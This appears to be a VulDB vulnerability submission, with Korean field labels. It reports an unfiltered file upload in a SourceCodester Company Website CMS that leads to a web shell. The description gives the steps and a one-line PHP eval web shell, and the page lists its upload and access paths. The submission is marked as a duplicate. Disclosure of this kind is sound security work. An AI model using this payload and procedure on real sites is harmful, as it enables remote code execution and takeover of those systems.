| 제목 | Company Website CMS File upload getshell |
|---|
| 설명 | Login in as admin, then go to /dashboard/createportfolio
File uploading is not filtered, and uploading a sentence is caused by a Trojan horse getshell
upload an evil .php
https://github.com/Drun1baby/CVE_Pentest/blob/main/Company-Website-CMS/images/upload.png?raw=true
upload shell like this
```php
<?php @eval($_POST['shell']);?>
```
then we can see it in /portfolio.php
https://github.com/Drun1baby/CVE_Pentest/blob/main/Company-Website-CMS/images/Ant.png
It makes sense
https://github.com/Drun1baby/CVE_Pentest/blob/main/Company-Website-CMS/images/SuccessAnt.png
https://github.com/Drun1baby/CVE_Pentest/blob/main/Company-Website-CMS/images/Shell.png
The website source is https://www.sourcecodester.com/download-code?nid=15517&title=Company+Website+CMS+in+PHP+and+MySQL+Free+Source+Code |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/download-code?nid=15517&title=Company+Website+CMS+in+PHP+and+MySQL+Free+Source+Code |
|---|
| 사용자 | Drunkbaby (UID 30821) |
|---|
| 제출 | 2022. 08. 10. AM 09:06 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 08. 11. AM 11:22 (1 day later) |
|---|
| 상태 | 중복 |
|---|
| VulDB 항목 | 206024 [SourceCodester Company Website CMS add-portfolio.php ufile 권한 상승] |
|---|
| 포인트들 | 0 |
|---|